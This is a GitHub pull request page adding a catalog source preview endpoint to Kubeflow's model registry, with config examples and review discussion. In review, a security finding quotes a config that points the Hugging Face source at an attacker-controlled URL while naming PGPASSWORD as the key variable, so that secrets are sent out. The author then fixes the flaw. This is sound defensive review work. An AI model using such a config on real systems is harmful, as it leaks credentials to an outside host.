
feat: catalog preview endpoint#1918

Merged
google-oss-prow[bot] merged 15 commits into kubeflow:main from Al-Pragliola:al-pragliola-catalog-preview-endpoint
Dec 5, 2025

Conversation

@Al-Pragliola
Contributor

@Al-Pragliola Al-Pragliola commented Nov 24, 2025

Description

In this PR we add a Catalog Source Preview feature that allows users to test and validate catalog source configurations before applying them to the model registry.

Key Features

  • New Preview Endpoint (POST /api/model_catalog/v1alpha1/sources/preview): Test your source configuration and see which models would be included or excluded based on your filters
  • Two Preview Modes:
    • Stateless mode: Upload both config and catalog data files to preview new sources without saving anything to the server
    • Path mode: Reference existing catalog files on the server to preview changes to saved sources
  • Hugging Face Source Support: Preview models directly from Hugging Face with API key authentication, including a configurable model limit safeguard
  • Filter Status Filtering: Query results by all, included, or excluded status to easily see the effect of your include/exclude patterns
  • Improved Pattern Documentation: Enhanced OpenAPI docs explaining the glob pattern syntax (* wildcard, case-insensitivity, anchored matching)
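The pattern rules listed above (`*` wildcard, case-insensitivity, anchored matching) can be sketched in a few lines of Python. This is only an illustration of the documented semantics, not the code from this PR; the function names `glob_to_regex` and `glob_match` are hypothetical, and it assumes `*` matches any run of characters, including `/`.

```python
import re

def glob_to_regex(pattern: str) -> re.Pattern:
    """Translate a glob whose only wildcard is '*' into a case-insensitive regex."""
    # Escape the literal pieces, then join them with '.*' where each '*' was.
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile(body, re.IGNORECASE)

def glob_match(pattern: str, name: str) -> bool:
    # fullmatch anchors the pattern at both ends of the model name.
    return glob_to_regex(pattern).fullmatch(name) is not None

print(glob_match("ibm-granite/*", "IBM-Granite/granite-3.0-8b-instruct"))  # True
print(glob_match("*-draft", "ibm-granite/granite-3.0-2b-draft"))           # True
print(glob_match("granite", "ibm-granite/granite-3.0-8b-instruct"))        # False
```

The last call shows why anchoring matters: a pattern without a wildcard has to equal the whole name, so a bare substring does not match.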

Bug Fixes

  • Fixed a panic when using pageSize < 1
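For readers unfamiliar with this class of bug, one common guard is to validate the page size before it reaches any slicing or paging logic. The sketch below is an assumption about how such a guard could look, not the fix made in this PR; `parse_page_size` and the default of 10 are hypothetical.

```python
from typing import Optional

def parse_page_size(raw: Optional[str], default: int = 10) -> int:
    """Return a validated page size, failing early with a clear error."""
    if raw is None or raw == "":
        return default  # hypothetical default when the caller sends nothing
    size = int(raw)  # raises ValueError on non-numeric input
    if size < 1:
        raise ValueError(f"pageSize must be at least 1, got {size}")
    return size
```

A handler would typically turn the `ValueError` into a 400 response rather than letting it propagate.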

Examples


YAML Source Example

config.yaml (source configuration):

type: yaml
includedModels:
  - "ibm-granite/*"
  - "meta-llama/*"
  - "mistralai/*"
excludedModels:
  - "*-draft"
  - "*-experimental"
properties:
  yamlCatalogPath: "models-catalog.yaml"  # only needed for path-based mode

catalogData.yaml (optional, for stateless mode):

models:
  - name: ibm-granite/granite-3.0-8b-instruct
    description: Granite 8B Instruct model
  - name: ibm-granite/granite-3.0-2b-draft
    description: Draft version (will be excluded)
  - name: meta-llama/Llama-2-7b-hf
    description: Llama 2 7B
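To make the expected outcome of the YAML example concrete, here is a rough Python sketch that applies the include/exclude patterns to the three sample models and builds a result with the same `items` and `summary` field names the endpoint returns. It is not the server implementation; `matches` and `preview` are hypothetical names, and it assumes that an empty include list admits every model and that exclusions win over inclusions.

```python
import re

def matches(pattern: str, name: str) -> bool:
    # '*' is the only wildcard; matching is anchored and case-insensitive.
    regex = ".*".join(re.escape(p) for p in pattern.split("*"))
    return re.fullmatch(regex, name, re.IGNORECASE) is not None

def preview(names, included_patterns, excluded_patterns):
    items = []
    for name in names:
        # Assumption: no include patterns means everything is a candidate.
        inc = not included_patterns or any(matches(p, name) for p in included_patterns)
        # Assumption: an exclude match overrides any include match.
        exc = any(matches(p, name) for p in excluded_patterns)
        items.append({"name": name, "included": inc and not exc})
    n_included = sum(item["included"] for item in items)
    return {
        "items": items,
        "summary": {
            "includedModels": n_included,
            "excludedModels": len(items) - n_included,
            "totalModels": len(items),
        },
    }

result = preview(
    ["ibm-granite/granite-3.0-8b-instruct",
     "ibm-granite/granite-3.0-2b-draft",
     "meta-llama/Llama-2-7b-hf"],
    ["ibm-granite/*", "meta-llama/*", "mistralai/*"],
    ["*-draft", "*-experimental"],
)
print(result["summary"])
# {'includedModels': 2, 'excludedModels': 1, 'totalModels': 3}
```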

Hugging Face Source Example

config.yaml:

type: hf
includedModels:
  - "microsoft/*"
  - "google/*"
  - "ibm-granite/*"
excludedModels:
  - "*-gguf"
  - "*-experimental"
properties:
  maxModels: 100          # limit per pattern (default: 500)
  apiKeyEnvVar: HF_API_KEY  # env var name (default: HF_API_KEY)
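The two properties above can be read as "how many models to fetch per pattern" and "which environment variable holds the token". A minimal Python sketch of resolving them with the documented defaults follows; `resolve_hf_settings` and `cap_models` are hypothetical helpers, and raising an error when the variable is unset is an assumption rather than confirmed behavior.

```python
import os

DEFAULT_MAX_MODELS = 500            # default stated in the example above
DEFAULT_API_KEY_ENV_VAR = "HF_API_KEY"

def resolve_hf_settings(properties, environ=os.environ):
    """Return (max_models, api_key) from a source's properties mapping."""
    max_models = int(properties.get("maxModels", DEFAULT_MAX_MODELS))
    env_var = properties.get("apiKeyEnvVar", DEFAULT_API_KEY_ENV_VAR)
    api_key = environ.get(env_var)
    if not api_key:
        # Assumption: a missing key is treated as a configuration error.
        raise RuntimeError(f"environment variable {env_var} is not set")
    return max_models, api_key

def cap_models(names, max_models):
    # The limit applies per pattern, so call this once per pattern's results.
    return names[:max_models]
```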

How Has This Been Tested?

Tested in a local dev environment with a valid HF API key, plus unit tests.

Merge criteria:

  • All the commits have been signed-off (To pass the DCO check)
  • The commits have meaningful messages
  • Automated tests are provided as part of the PR for major new functionalities; testing instructions have been added in the PR body (for PRs involving changes that are not immediately obvious).
  • The developer has manually tested the changes and verified that the changes work.
  • Code changes follow the kubeflow contribution guidelines.
  • For first time contributors: Please reach out to the Reviewers to ensure all tests are being run, ensuring the label ok-to-test has been added to the PR.

@Al-Pragliola
Contributor Author

cc @mturley @manaswinidas

@Al-Pragliola Al-Pragliola force-pushed the al-pragliola-catalog-preview-endpoint branch 2 times, most recently from 61c39ee to 4730746 Compare December 3, 2025 16:47
@Al-Pragliola Al-Pragliola marked this pull request as ready for review December 4, 2025 17:26
@google-oss-prow google-oss-prow Bot requested a review from jonburdo December 4, 2025 17:26
Member

@pboyd pboyd left a comment


I'm still testing this, but I see a security problem with the HF preview functionality. The ability to set the URL and the environment variable name would allow an attacker to leak at least the HF token and (unless I missed some validation) unrelated environment variables. For example:

type: hf
includedModels:
  - "microsoft/*"
properties:
  apiKeyEnvVar: PGPASSWORD
  url: https://some-attacker-controlled-domain.com

Member

@pboyd pboyd left a comment


Outside of the security issue and the merge conflict, this looks really good. I tested it and it's working well.

For anyone else who wants to try it:

$ curl -s -F config=@config.yaml -F catalogData=@catalog/internal/catalog/testdata/dev-community-models.yaml 'http://localhost:8082/api/model_catalog/v1alpha1/sources/preview' | jq .
{
  "items": [
    {
      "included": true,
      "name": "open-models/falcon-mini-2b"
    },
    {
      "included": true,
      "name": "quantum-research/sentiment-analyzer-base"
    },
    {
      "included": true,
      "name": "indie-ai/creative-writer-3b"
    },
    {
      "included": true,
      "name": "alpha-labs/translation-mini-1b"
    }
  ],
  "nextPageToken": "",
  "pageSize": 10,
  "size": 4,
  "summary": {
    "excludedModels": 0,
    "includedModels": 4,
    "totalModels": 4
  }
}

Where config.yaml is:

type: yaml
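For anyone who would rather script this than use curl, the same multipart upload can be built with the Python standard library. This is a sketch only: the field names `config` and `catalogData` and the URL come from the curl command above, while `build_preview_request` and the filenames are hypothetical.

```python
import uuid
import urllib.request

PREVIEW_URL = "http://localhost:8082/api/model_catalog/v1alpha1/sources/preview"

def build_preview_request(config: bytes, catalog_data: bytes, url: str = PREVIEW_URL):
    """Build (but do not send) a multipart/form-data POST for stateless preview."""
    boundary = uuid.uuid4().hex
    parts = []
    for field, filename, payload in (
        ("config", "config.yaml", config),
        ("catalogData", "catalog.yaml", catalog_data),
    ):
        header = (
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n"
        )
        parts.append(header.encode() + payload + b"\r\n")
    body = b"".join(parts) + f"--{boundary}--\r\n".encode()
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}
    return urllib.request.Request(url, data=body, headers=headers, method="POST")

req = build_preview_request(b"type: yaml\n", b"models: []\n")
```

Passing `req` to `urllib.request.urlopen` and decoding the body with `json.load` should give the same structure as the `jq` output above, assuming the server is running locally.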

One thing that's a little annoying is that I can't just paste a full source config entry. For instance, I took this from dev-sources.yaml:

name: "Community and Custom Models"
id: community_custom_models
type: yaml
enabled: true

But I can't preview it because of the extra fields (name, id, enabled). I know they're meaningless for preview, but could it ignore the extra fields so we can preview the same format that we'll save later?

Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
@Al-Pragliola Al-Pragliola force-pushed the al-pragliola-catalog-preview-endpoint branch from c3e7cdf to f33d223 Compare December 5, 2025 15:45
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
@Al-Pragliola
Contributor Author

I'm still testing this, but I see a security problem with the HF preview functionality. The ability to set the URL and the environment variable name would allow an attacker to leak at least the HF token and (unless I missed some validation) unrelated environment variables. For example:

type: hf
includedModels:
  - "microsoft/*"
properties:
  apiKeyEnvVar: PGPASSWORD
  url: https://some-attacker-controlled-domain.com

Thanks for your review, @pboyd. Yes, this is indeed a serious security concern!

I added logic in preview to delete the url property in 1ae1751, and I also added a log warning when someone tries to use a custom url for the hf type in a69d9db.
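As a rough illustration of the mitigation described here (dropping `url` before a preview runs and logging a warning), a Python sketch might look like the following. It is not the code from the referenced commits; `sanitize_hf_preview_properties` and the logger name are hypothetical.

```python
import logging

logger = logging.getLogger("catalog.preview")  # hypothetical logger name

def sanitize_hf_preview_properties(properties: dict) -> dict:
    """Return a copy of the properties with any caller-supplied url removed."""
    cleaned = dict(properties)  # never mutate the caller's mapping
    if "url" in cleaned:
        # A custom endpoint could receive the API key, so it is dropped.
        logger.warning("ignoring custom url for hf source in preview")
        del cleaned["url"]
    return cleaned

cleaned = sanitize_hf_preview_properties(
    {"apiKeyEnvVar": "PGPASSWORD", "url": "https://some-attacker-controlled-domain.com"}
)
print(cleaned)  # {'apiKeyEnvVar': 'PGPASSWORD'}
```

With the `url` removed, whatever value the environment variable holds is no longer sent to a caller-chosen host.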

@Al-Pragliola
Contributor Author

Outside of the security issue and the merge conflict, this looks really good. I tested it and it's working well.

For anyone else who wants to try it:

$ curl -s -F config=@config.yaml -F catalogData=@catalog/internal/catalog/testdata/dev-community-models.yaml 'http://localhost:8082/api/model_catalog/v1alpha1/sources/preview' | jq .
{
  "items": [
    {
      "included": true,
      "name": "open-models/falcon-mini-2b"
    },
    {
      "included": true,
      "name": "quantum-research/sentiment-analyzer-base"
    },
    {
      "included": true,
      "name": "indie-ai/creative-writer-3b"
    },
    {
      "included": true,
      "name": "alpha-labs/translation-mini-1b"
    }
  ],
  "nextPageToken": "",
  "pageSize": 10,
  "size": 4,
  "summary": {
    "excludedModels": 0,
    "includedModels": 4,
    "totalModels": 4
  }
}

Where config.yaml is:

type: yaml

One thing that's a little annoying is that I can't just paste a full source config entry. For instance, I took this from dev-sources.yaml:

name: "Community and Custom Models"
id: community_custom_models
type: yaml
enabled: true

But I can't preview it because of the extra fields (name, id, enabled). I know they're meaningless for preview, but could it ignore the extra fields so we can preview the same format that we'll save later?

After f9a85f1 it should be possible to use a full source config entry.
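One way to picture "ignore the extra fields" is to keep only the keys the preview cares about and silently drop the rest. The sketch below assumes the preview-relevant keys are the four that appear in the examples in this PR; `to_preview_config` is a hypothetical helper, and the actual change may simply tolerate unknown fields while decoding.

```python
# Keys used by the preview examples in this PR; treated here as an assumption.
PREVIEW_FIELDS = {"type", "includedModels", "excludedModels", "properties"}

def to_preview_config(source_entry: dict) -> dict:
    """Drop fields such as name, id and enabled that preview does not need."""
    return {k: v for k, v in source_entry.items() if k in PREVIEW_FIELDS}

entry = {
    "name": "Community and Custom Models",
    "id": "community_custom_models",
    "type": "yaml",
    "enabled": True,
}
print(to_preview_config(entry))  # {'type': 'yaml'}
```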

@Al-Pragliola Al-Pragliola requested a review from pboyd December 5, 2025 16:30
@pboyd
Member

pboyd commented Dec 5, 2025

Thanks for the fixes.

/lgtm
/retest

Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
@google-oss-prow google-oss-prow Bot removed the lgtm label Dec 5, 2025
Member

@pboyd pboyd left a comment


/lgtm

@google-oss-prow google-oss-prow Bot added the lgtm label Dec 5, 2025
@Al-Pragliola
Contributor Author

@google-oss-prow
Contributor

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: Al-Pragliola

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Details Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@google-oss-prow google-oss-prow Bot merged commit 6920bc9 into kubeflow:main Dec 5, 2025
23 checks passed
@Al-Pragliola Al-Pragliola deleted the al-pragliola-catalog-preview-endpoint branch December 5, 2025 18:51
adysenrothman added a commit to opendatahub-io/model-registry that referenced this pull request Dec 9, 2025
sync: main to stable
keep [1891](kubeflow#1891)
keep [1959](kubeflow#1959)
keep [1961](kubeflow#1961)
keep [1955](kubeflow#1955)
keep [1957](kubeflow#1957)
keep [1918](kubeflow#1918)
keep [759](#759)
keep [1975](kubeflow#1975)
keep [1976](kubeflow#1976)
keep [1963](kubeflow#1963)
keep [801](#801)
@Al-Pragliola Al-Pragliola restored the al-pragliola-catalog-preview-endpoint branch December 10, 2025 18:46
@Al-Pragliola Al-Pragliola deleted the al-pragliola-catalog-preview-endpoint branch December 11, 2025 15:29
2 participants